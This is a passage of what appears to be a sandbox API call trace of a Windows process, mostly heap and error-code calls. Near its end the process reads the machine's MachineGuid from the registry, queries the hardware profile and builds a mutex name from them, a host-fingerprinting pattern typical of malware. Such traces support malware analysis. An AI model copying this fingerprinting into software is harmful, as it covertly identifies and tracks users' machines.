GetLastError () returned 0x0 [0116.142] SetLastError (dwErrCode=0x0) [0116.142] GetLastError () returned 0x0 [0116.142] SetLastError (dwErrCode=0x0) [0116.142] GetLastError () returned 0x0 [0116.142] SetLastError (dwErrCode=0x0) [0116.142] GetLastError () returned 0x0 [0116.143] SetLastError (dwErrCode=0x0) [0116.143] GetLastError () returned 0x0 [0116.143] SetLastError (dwErrCode=0x0) [0116.143] GetLastError () returned 0x0 [0116.143] SetLastError (dwErrCode=0x0) [0116.143] GetLastError () returned 0x0 [0116.143] SetLastError (dwErrCode=0x0) [0116.143] GetLastError () returned 0x0 [0116.143] SetLastError (dwErrCode=0x0) [0116.143] GetLastError () returned 0x0 [0116.143] SetLastError (dwErrCode=0x0) [0116.143] GetLastError () returned 0x0 [0116.143] SetLastError (dwErrCode=0x0) [0116.143] GetLastError () returned 0x0 [0116.143] SetLastError (dwErrCode=0x0) [0116.143] GetLastError () returned 0x0 [0116.143] SetLastError (dwErrCode=0x0) [0116.143] GetLastError () returned 0x0 [0116.144] SetLastError (dwErrCode=0x0) [0116.144] GetLastError () returned 0x0 [0116.144] SetLastError (dwErrCode=0x0) [0116.144] GetLastError () returned 0x0 [0116.144] SetLastError (dwErrCode=0x0) [0116.144] GetLastError () returned 0x0 [0116.144] SetLastError (dwErrCode=0x0) [0116.144] GetLastError () returned 0x0 [0116.144] SetLastError (dwErrCode=0x0) [0116.144] GetLastError () returned 0x0 [0116.144] SetLastError (dwErrCode=0x0) [0116.144] GetLastError () returned 0x0 [0116.144] SetLastError (dwErrCode=0x0) [0116.144] GetLastError () returned 0x0 [0116.144] SetLastError (dwErrCode=0x0) [0116.144] GetLastError () returned 0x0 [0116.144] SetLastError (dwErrCode=0x0) [0116.145] GetLastError () returned 0x0 [0116.145] SetLastError (dwErrCode=0x0) [0116.145] GetLastError () returned 0x0 [0116.145] SetLastError (dwErrCode=0x0) [0116.145] GetLastError () returned 0x0 [0116.145] SetLastError (dwErrCode=0x0) [0116.145] GetLastError () returned 0x0 [0116.145] SetLastError (dwErrCode=0x0) [0116.145] GetLastError () returned 0x0 [0116.145] SetLastError (dwErrCode=0x0) [0116.145] GetLastError () returned 0x0 [0116.145] SetLastError (dwErrCode=0x0) [0116.145] GetLastError () returned 0x0 [0116.145] SetLastError (dwErrCode=0x0) [0116.145] GetLastError () returned 0x0 [0116.145] SetLastError (dwErrCode=0x0) [0116.145] GetLastError () returned 0x0 [0116.146] SetLastError (dwErrCode=0x0) [0116.146] GetLastError () returned 0x0 [0116.146] SetLastError (dwErrCode=0x0) [0116.146] GetLastError () returned 0x0 [0116.146] SetLastError (dwErrCode=0x0) [0116.146] GetLastError () returned 0x0 [0116.146] SetLastError (dwErrCode=0x0) [0116.146] GetLastError () returned 0x0 [0116.146] SetLastError (dwErrCode=0x0) [0116.146] GetLastError () returned 0x0 [0116.146] SetLastError (dwErrCode=0x0) [0116.146] GetLastError () returned 0x0 [0116.146] SetLastError (dwErrCode=0x0) [0116.146] GetLastError () returned 0x0 [0116.146] SetLastError (dwErrCode=0x0) [0116.146] GetLastError () returned 0x0 [0116.146] SetLastError (dwErrCode=0x0) [0116.147] GetLastError () returned 0x0 [0116.147] SetLastError (dwErrCode=0x0) [0116.147] GetLastError () returned 0x0 [0116.147] SetLastError (dwErrCode=0x0) [0116.147] GetLastError () returned 0x0 [0116.147] SetLastError (dwErrCode=0x0) [0116.147] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x98) returned 0x2f819f8 [0116.147] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x1f) returned 0x2f81a98 [0116.147] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x36) returned 0x2f81ac0 [0116.147] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x37) returned 0x2f81b00 [0116.147] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x3c) returned 0x2f81b40 [0116.147] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x31) returned 0x2f81b88 [0116.147] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x17) returned 0x2f81bc8 [0116.147] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x24) returned 0x2f81be8 [0116.147] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x14) returned 0x2f81c18 [0116.147] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0xd) returned 0x2f81c38 [0116.147] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x25) returned 0x2f81c50 [0116.147] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x39) returned 0x2f81c80 [0116.147] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x18) returned 0x2f81cc8 [0116.147] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x17) returned 0x2f81ce8 [0116.147] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0xe) returned 0x2f81d08 [0116.147] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x69) returned 0x2f81d20 [0116.147] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x3e) returned 0x2f81d98 [0116.147] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x1b) returned 0x2f81de0 [0116.147] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x1d) returned 0x2f81e08 [0116.148] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x48) returned 0x2f81e30 [0116.148] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x12) returned 0x2f81e80 [0116.148] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x18) returned 0x2f81ea0 [0116.148] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x1b) returned 0x2f81ec0 [0116.148] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x24) returned 0x2f81ee8 [0116.148] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x29) returned 0x2f81f18 [0116.148] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x1e) returned 0x2f81f50 [0116.148] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x41) returned 0x2f81f78 [0116.148] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x17) returned 0x2f81fc8 [0116.148] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0xf) returned 0x2f81fe8 [0116.148] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x16) returned 0x2f82000 [0116.148] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x2a) returned 0x2f82020 [0116.148] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x29) returned 0x2f82058 [0116.148] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x15) returned 0x2f82090 [0116.148] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x1e) returned 0x2f820b0 [0116.148] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x2a) returned 0x2f820d8 [0116.148] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x12) returned 0x2f82110 [0116.148] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x18) returned 0x2f82130 [0116.148] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x46) returned 0x2f82150 [0116.148] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f811f8 | out: hHeap=0x2f80000) returned 1 [0116.205] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x80) returned 0x2f811f8 [0116.205] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x800) returned 0x2f821a0 [0116.205] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0116.205] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.205] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x466123) returned 0x40439d [0116.205] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.206] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.206] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.206] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.207] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.207] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.207] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.208] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.208] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.208] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.208] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.209] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.209] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.209] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.210] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.210] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.210] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.210] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.211] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.212] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.212] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.212] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.212] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.213] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.213] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.213] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.214] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.214] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.214] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.215] RtlSizeHeap (HeapHandle=0x2f80000, Flags=0x0, MemoryPointer=0x2f811f8) returned 0x80 [0116.215] GetLastError () returned 0x0 [0116.215] SetLastError (dwErrCode=0x0) [0116.215] GetLastError () returned 0x0 [0116.215] SetLastError (dwErrCode=0x0) [0116.215] GetLastError () returned 0x0 [0116.215] SetLastError (dwErrCode=0x0) [0116.215] GetLastError () returned 0x0 [0116.215] SetLastError (dwErrCode=0x0) [0116.215] GetLastError () returned 0x0 [0116.215] SetLastError (dwErrCode=0x0) [0116.215] GetLastError () returned 0x0 [0116.216] SetLastError (dwErrCode=0x0) [0116.216] GetLastError () returned 0x0 [0116.216] SetLastError (dwErrCode=0x0) [0116.216] GetLastError () returned 0x0 [0116.216] SetLastError (dwErrCode=0x0) [0116.216] GetLastError () returned 0x0 [0116.216] SetLastError (dwErrCode=0x0) [0116.216] GetLastError () returned 0x0 [0116.216] SetLastError (dwErrCode=0x0) [0116.216] GetLastError () returned 0x0 [0116.216] SetLastError (dwErrCode=0x0) [0116.216] GetLastError () returned 0x0 [0116.216] SetLastError (dwErrCode=0x0) [0116.216] GetLastError () returned 0x0 [0116.216] SetLastError (dwErrCode=0x0) [0116.216] GetLastError () returned 0x0 [0116.216] SetLastError (dwErrCode=0x0) [0116.217] GetLastError () returned 0x0 [0116.217] SetLastError (dwErrCode=0x0) [0116.217] GetLastError () returned 0x0 [0116.217] SetLastError (dwErrCode=0x0) [0116.217] GetLastError () returned 0x0 [0116.217] SetLastError (dwErrCode=0x0) [0116.217] GetLastError () returned 0x0 [0116.217] SetLastError (dwErrCode=0x0) [0116.217] GetLastError () returned 0x0 [0116.217] SetLastError (dwErrCode=0x0) [0116.217] GetLastError () returned 0x0 [0116.217] SetLastError (dwErrCode=0x0) [0116.217] GetLastError () returned 0x0 [0116.217] SetLastError (dwErrCode=0x0) [0116.217] GetLastError () returned 0x0 [0116.217] SetLastError (dwErrCode=0x0) [0116.217] GetLastError () returned 0x0 [0116.218] SetLastError (dwErrCode=0x0) [0116.218] GetLastError () returned 0x0 [0116.218] SetLastError (dwErrCode=0x0) [0116.218] GetLastError () returned 0x0 [0116.218] SetLastError (dwErrCode=0x0) [0116.218] GetLastError () returned 0x0 [0116.218] SetLastError (dwErrCode=0x0) [0116.218] GetLastError () returned 0x0 [0116.218] SetLastError (dwErrCode=0x0) [0116.218] GetLastError () returned 0x0 [0116.218] SetLastError (dwErrCode=0x0) [0116.218] GetLastError () returned 0x0 [0116.218] SetLastError (dwErrCode=0x0) [0116.218] GetLastError () returned 0x0 [0116.218] SetLastError (dwErrCode=0x0) [0116.218] GetLastError () returned 0x0 [0116.219] SetLastError (dwErrCode=0x0) [0116.219] GetLastError () returned 0x0 [0116.219] SetLastError (dwErrCode=0x0) [0116.219] GetLastError () returned 0x0 [0116.219] SetLastError (dwErrCode=0x0) [0116.219] GetLastError () returned 0x0 [0116.219] SetLastError (dwErrCode=0x0) [0116.219] GetLastError () returned 0x0 [0116.219] SetLastError (dwErrCode=0x0) [0116.219] GetLastError () returned 0x0 [0116.219] SetLastError (dwErrCode=0x0) [0116.219] GetLastError () returned 0x0 [0116.219] SetLastError (dwErrCode=0x0) [0116.219] GetLastError () returned 0x0 [0116.219] SetLastError (dwErrCode=0x0) [0116.219] GetLastError () returned 0x0 [0116.220] SetLastError (dwErrCode=0x0) [0116.220] GetLastError () returned 0x0 [0116.220] SetLastError (dwErrCode=0x0) [0116.220] GetLastError () returned 0x0 [0116.220] SetLastError (dwErrCode=0x0) [0116.220] GetLastError () returned 0x0 [0116.220] SetLastError (dwErrCode=0x0) [0116.220] GetLastError () returned 0x0 [0116.220] SetLastError (dwErrCode=0x0) [0116.220] GetLastError () returned 0x0 [0116.220] SetLastError (dwErrCode=0x0) [0116.220] GetLastError () returned 0x0 [0116.220] SetLastError (dwErrCode=0x0) [0116.220] GetLastError () returned 0x0 [0116.220] SetLastError (dwErrCode=0x0) [0116.221] GetLastError () returned 0x0 [0116.255] GetCurrentHwProfileA (in: lpHwProfileInfo=0x18fa18 | out: lpHwProfileInfo=0x18fa18) returned 1 [0116.275] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f81280 [0116.275] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x18f888 | out: phkResult=0x18f888*=0xb0) returned 0x0 [0116.275] RegQueryValueExA (in: hKey=0xb0, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x0, lpData=0x18f990, lpcbData=0x18f88c*=0xff | out: lpType=0x0, lpData=0x18f990*=0x30, lpcbData=0x18f88c*=0x25) returned 0x0 [0116.275] RegCloseKey (hKey=0xb0) returned 0x0 [0116.275] CharToOemA (in: pSrc="0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", pDst=0x18f890 | out: pDst="0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 1 [0116.275] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f812b8 [0116.275] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x50) returned 0x2f812f0 [0116.275] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f812b8 | out: hHeap=0x2f80000) returned 1 [0116.275] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="0303d5b4-ffe9-470e-9dd8-7d9ec416e53f{846ee340-7039-11de-9d20-806e6f6e6963}") returned 0xb0 [0116.275] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f812f0 | out: hHeap=0x2f80000) returned 1 [0116.275] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f81280 | out: hHeap=0x2f80000) returned 1 [0116.275] GetLastError () returned 0x0 [0116.275] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f81280 [0116.275] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x19) returned 0x2f812a8 [0116.275] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f81280 | out: hHeap=0x2f80000) returned 1 [0116.276] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f81280 [0116.276] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x1d) returned 0x2f812d0 [0116.276] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f81280 | out: hHeap=0x2f80000) returned 1 [0116.276] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f81280 [0116.276] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x1d) returned 0x2f812f8 [0116.276] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f81280 | out: hHeap=0x2f80000) returned 1 [0116.276] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f81280 [0116.276] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x29) returned 0x2f81320 [0116.276] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f81280 | out: hHeap=0x2f80000) returned 1 [0116.276] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f81280 [0116.276] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x19) returned 0x2f81358 [0116.276] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f81280 | out: hHeap=0x2f80000) returned 1 [0116.276] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x11) returned 0x2f81280 [0116.276] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f81380 [0116.276] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x31) returned 0x2f813b8 [0116.276] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f81380 | out: hHeap=0x2f80000) returned 1 [0116.276] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f81380 [0116.276] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x21) returned 0x2f813f8 [0116.276] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f81380 | out: hHeap=0x2f80000) returned 1 [0116.276] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x70) returned 0x2f81428 [0116.276] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x89) returned 0x2f814a0 [0116.276] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f81428 | out: hHeap=0x2f80000) returned 1 [0116.276] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f81380 [0116.276] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x1d) returned 0x2f81428 [0116.276] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f81380 | out: hHeap=0x2f80000) returned 1 [0116.276] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f81380 [0116.276] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x1d) returned 0x2f81450 [0116.276] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f81380 | out: hHeap=0x2f80000) returned 1 [0116.276] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f81478 [0116.276] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x1d) returned 0x2f81380 [0116.276] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f81478 | out: hHeap=0x2f80000) returned 1 [0116.277] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f81478 [0116.277] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x21) returned 0x2f81538 [0116.277] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f81478 | out: hHeap=0x2f80000) returned 1 [0116.277] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f81478 [0116.277] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x21) returned 0x2f81568 [0116.277] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f81478 | out: hHeap=0x2f80000) returned 1 [0116.277] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0xd) returned 0x2f81478 [0116.277] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x50) returned 0x2f81598 [0116.277] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x59) returned 0x2f815f0 [0116.277] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f81598 | out: hHeap=0x2f80000) returned 1 [0116.277] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x60) returned 0x2f81658 [0116.277] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x71) returned 0x2f816c0 [0116.277] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f81658 | out: hHeap=0x2f80000) returned 1 [0116.277] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x40) returned 0x2f81598 [0116.277] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x51) returned 0x2f81658 [0116.277] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f81598 | out: hHeap=0x2f80000) returned 1 [0116.277] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x90) returned 0x2f829a8 [0116.277] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0xad) returned 0x2f82a40 [0116.277] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f829a8 | out: hHeap=0x2f80000) returned 1 [0116.277] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x40) returned 0x2f81598 [0116.277] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x4d) returned 0x2f829a8 [0116.277] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f81598 | out: hHeap=0x2f80000) returned 1 [0116.277] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f82a00 [0116.277] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x31) returned 0x2f81598 [0116.277] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f82a00 | out: hHeap=0x2f80000) returned 1 [0116.277] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x50) returned 0x2f82af8 [0116.277] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x5d) returned 0x2f82b50 [0116.277] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f82af8 | out: hHeap=0x2f80000) returned 1 [0116.277] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x50) returned 0x2f82af8 [0116.277] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x59) returned 0x2f82bb8 [0116.277] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f82af8 | out: hHeap=0x2f80000) returned 1 [0116.278] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0xd) returned 0x2f815d8 [0116.278] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0xd) returned 0x2f81740 [0116.278] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0xd) returned 0x2f82a00 [0116.278] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f82af8 [0116.278] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x31) returned 0x2f82c20 [0116.278] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f82af8 | out: hHeap=0x2f80000) returned 1 [0116.278] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x40) returned 0x2f82af8 [0116.278] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x4d) returned 0x2f82c60 [0116.278] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f82af8 | out: hHeap=0x2f80000) returned 1 [0116.278] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f82a18 [0116.278] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x19) returned 0x2f82af8 [0116.278] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f82a18 | out: hHeap=0x2f80000) returned 1 [0116.278] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0xd) returned 0x2f82a18 [0116.278] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f82b20 [0116.278] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x19) returned 0x2f82cb8 [0116.278] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f82b20 | out: hHeap=0x2f80000) returned 1 [0116.278] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f82ce0 [0116.278] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x31) returned 0x2f82d18 [0116.278] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f82ce0 | out: hHeap=0x2f80000) returned 1 [0116.278] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x40) returned 0x2f82d58 [0116.278] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x51) returned 0x2f82da0 [0116.278] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f82d58 | out: hHeap=0x2f80000) returned 1 [0116.278] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x11) returned 0x2f82b20 [0116.278] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f82ce0 [0116.278] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x19) returned 0x2f82d58 [0116.279] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f82ce0 | out: hHeap=0x2f80000) returned 1 [0116.279] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.280] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x19) returned 0x2f8d6a8 [0116.280] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.280] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.280] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x21) returned 0x2f82ce0 [0116.280] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.280] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f8e268 [0116.280] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x39) returned 0x2f8e2a0 [0116.280] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8e268 | out: hHeap=0x2f80000) returned 1 